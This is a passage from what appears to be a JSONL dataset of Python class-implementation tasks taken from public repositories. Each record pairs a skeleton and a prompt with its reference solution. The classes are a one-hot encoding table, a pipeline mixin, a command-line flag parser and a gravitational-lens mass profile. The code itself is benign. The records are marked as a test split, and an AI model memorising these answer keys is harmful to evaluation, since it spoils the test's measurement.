open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)"], "bodies_text": "<|body_start_0|>\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n<|end_body_0|>\n\n<|body_start_1|>\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n<|end_body_1|>\n\n<|body_start_2|>\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n<|end_body_2|>\n\n<|body_start_3|>\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n<|end_body_3|>\n", "class_docstring": "模型字段one-hot编码映射表", "class_name": "Table", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n <|body_0|>\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n <|body_1|>\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n <|body_2|>\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n<|end_body_0|>\n\n<|body_start_1|>\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n<|end_body_1|>\n\n<|body_start_2|>\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n<|end_body_2|>\n\n<|body_start_3|>\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000447", "length_bytes": 2954, "license_type": "no_license", "methods": [{"docstring": ":param df: :param feature_list: :param prefix_list:", "name": "__init__", "signature": "def __init__(self, df, feature_list, prefix_list)"}, {"docstring": ":param feature: :return:", "name": "get_feature_dict", "signature": "def get_feature_dict(self, feature)"}, {"docstring": ":param feature_name: :param prefix_str: :return:", "name": "get_table_list", "signature": "def get_table_list(self, feature_name, prefix_str)"}, {"docstring": ":param path: :return:", "name": "get_format_table", "signature": "def get_format_table(self, path)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_val_000191", "prompt": "Implement the Python class `Table` described below.\n\nClass description:\n模型字段one-hot编码映射表\n\nMethod signatures and docstrings:\n- def __init__(self, df, feature_list, prefix_list): :param df: :param feature_list: :param prefix_list:\n- def get_feature_dict(self, feature): :param feature: :return:\n- def get_table_list(self, feature_name, prefix_str): :param feature_name: :param prefix_str: :return:\n- def get_format_table(self, path): :param path: :return:", "prompted_full_text": "Implement the Python class `Table` described below.\n\nClass description:\n模型字段one-hot编码映射表\n\nMethod signatures and docstrings:\n- def __init__(self, df, feature_list, prefix_list): :param df: :param feature_list: :param prefix_list:\n- def get_feature_dict(self, feature): :param feature: :return:\n- def get_table_list(self, feature_name, prefix_str): :param feature_name: :param prefix_str: :return:\n- def get_format_table(self, path): :param path: :return:\n\n<|skeleton|>\nclass Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n <|body_0|>\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n <|body_1|>\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n <|body_2|>\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n<|end_body_0|>\n\n<|body_start_1|>\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n<|end_body_1|>\n\n<|body_start_2|>\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n<|end_body_2|>\n\n<|body_start_3|>\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n<|end_body_3|>\n", "revision_id": "c3c453f402bedc7a22dc0f873a602180f94678ef", "skeleton": "<|skeleton|>\nclass Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n <|body_0|>\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n <|body_1|>\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n <|body_2|>\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n", "source": "the_stack_v2_python_sparse", "source_path": "insurance/data/format_table.py", "source_repo": "StevenYang88/tuanxian_price", "split": "test", "star_events_count": 0} {"blob_id": "9750f9c0d3e432c43d6dcf4bd5c1eee8f5beeaba", "bodies": ["if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\nelse:\n return self.parent().owning_pipeline", "if self.owning_pipeline is None:\n return []\nreturn list(self.owning_pipeline.filtered_sessions.keys())", "if self.owning_pipeline is None:\n return []\nreturn self.owning_pipeline.filtered_contexts", "if self.owning_pipeline is None:\n return []\nreturn [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]"], "bodies_text": "<|body_start_0|>\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n<|end_body_0|>\n\n<|body_start_1|>\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n<|end_body_1|>\n\n<|body_start_2|>\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n<|end_body_2|>\n\n<|body_start_3|>\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n<|end_body_3|>\n", "class_docstring": "Implementors own a pipeline or have access through a parent", "class_name": "PipelineOwningMixin", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n <|body_0|>\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_1|>\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_2|>\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n<|end_body_0|>\n\n<|body_start_1|>\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n<|end_body_1|>\n\n<|body_start_2|>\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n<|end_body_2|>\n\n<|body_start_3|>\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000448", "length_bytes": 1315, "license_type": "permissive", "methods": [{"docstring": "The owning_pipeline property.", "name": "owning_pipeline", "signature": "def owning_pipeline(self)"}, {"docstring": "Gets the names of the filters applied and updates the config rows with them.", "name": "all_filtered_session_keys", "signature": "def all_filtered_session_keys(self)"}, {"docstring": "Gets the names of the filters applied and updates the config rows with them.", "name": "all_filtered_session_contexts", "signature": "def all_filtered_session_contexts(self)"}, {"docstring": "Gets the names of the filters applied and updates the config rows with them.", "name": "all_filtered_session_context_descriptions", "signature": "def all_filtered_session_context_descriptions(self)"}], "n_methods": 4, "prompt": "Implement the Python class `PipelineOwningMixin` described below.\n\nClass description:\nImplementors own a pipeline or have access through a parent\n\nMethod signatures and docstrings:\n- def owning_pipeline(self): The owning_pipeline property.\n- def all_filtered_session_keys(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_contexts(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_context_descriptions(self): Gets the names of the filters applied and updates the config rows with them.", "prompted_full_text": "Implement the Python class `PipelineOwningMixin` described below.\n\nClass description:\nImplementors own a pipeline or have access through a parent\n\nMethod signatures and docstrings:\n- def owning_pipeline(self): The owning_pipeline property.\n- def all_filtered_session_keys(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_contexts(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_context_descriptions(self): Gets the names of the filters applied and updates the config rows with them.\n\n<|skeleton|>\nclass PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n <|body_0|>\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_1|>\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_2|>\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n<|end_body_0|>\n\n<|body_start_1|>\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n<|end_body_1|>\n\n<|body_start_2|>\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n<|end_body_2|>\n\n<|body_start_3|>\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n<|end_body_3|>\n", "revision_id": "212399d826284b394fce8894ff1a93133aef783f", "skeleton": "<|skeleton|>\nclass PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n <|body_0|>\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_1|>\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_2|>\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pyphoplacecellanalysis/GUI/Qt/Mixins/PipelineOwningMixin.py", "source_repo": "CommanderPho/pyPhoPlaceCellAnalysis", "split": "test", "star_events_count": 1} {"blob_id": "1ef333f8b0c9749f64f2b17ccfcd2fa3e3255666", "bodies": ["object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\nobject.__setattr__(self, 'namespace', namespace)\nobject.__setattr__(self, 'passthrough_args', passthrough_args)\nobject.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)", "flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\nfor flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\nreturn flag_value_map"], "bodies_text": "<|body_start_0|>\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n<|end_body_0|>\n\n<|body_start_1|>\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ParseArgsRequest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ParseArgsRequest:\n\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n <|body_0|>\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n<|end_body_0|>\n\n<|body_start_1|>\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000449", "length_bytes": 32099, "license_type": "permissive", "methods": [{"docstring": ":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on", "name": "__init__", "signature": "def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None"}, {"docstring": "Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).", "name": "_create_flag_value_map", "signature": "def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001215", "prompt": "Implement the Python class `ParseArgsRequest` described below.\n\nClass description:\nImplement the ParseArgsRequest class.\n\nMethod signatures and docstrings:\n- def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None: :param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\n- def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]: Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).", "prompted_full_text": "Implement the Python class `ParseArgsRequest` described below.\n\nClass description:\nImplement the ParseArgsRequest class.\n\nMethod signatures and docstrings:\n- def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None: :param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\n- def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]: Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\n\n<|skeleton|>\nclass ParseArgsRequest:\n\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n <|body_0|>\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n<|end_body_0|>\n\n<|body_start_1|>\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n<|end_body_1|>\n", "revision_id": "98cbda8545f0d58c586ed2daa76fefd729d5e0d5", "skeleton": "<|skeleton|>\nclass ParseArgsRequest:\n\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n <|body_0|>\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ParseArgsRequest:\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n", "source": "the_stack_v2_python_sparse", "source_path": "src/python/pants/option/parser.py", "source_repo": "pantsbuild/pants", "split": "test", "star_events_count": 2708} {"blob_id": "61e7b7dc054a879b0886ebc436cc07266c17dd78", "bodies": ["z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\nscale_length = theta_e * jnp.sqrt(axis_ratio)\ncomplex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\nreturn (complex_derivative.real, complex_derivative.imag)", "ellip_vector = x * axis_ratio + 1j * y\nellip_radius = jnp.abs(ellip_vector)\nellip_angle = jnp.angle(ellip_vector)\nomega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\nreturn 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega", "flattening = (1 - axis_ratio) / (1 + axis_ratio)\nomegas = jnp.zeros_like(ellip_angle)\nfour_n = 1 * jnp.exp(1j * ellip_angle)\nomegas += four_n\nfour_factor = -flattening * jnp.exp(2j * ellip_angle)\nfor n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\nreturn omegas"], "bodies_text": "<|body_start_0|>\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n<|end_body_0|>\n\n<|body_start_1|>\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n<|end_body_1|>\n\n<|body_start_2|>\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n<|end_body_2|>\n", "class_docstring": "Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.", "class_name": "EPL", "detected_licenses": ["Apache-2.0", "CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass EPL:\n \"\"\"Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n <|body_0|>\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n <|body_1|>\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n<|end_body_0|>\n\n<|body_start_1|>\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n<|end_body_1|>\n\n<|body_start_2|>\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n 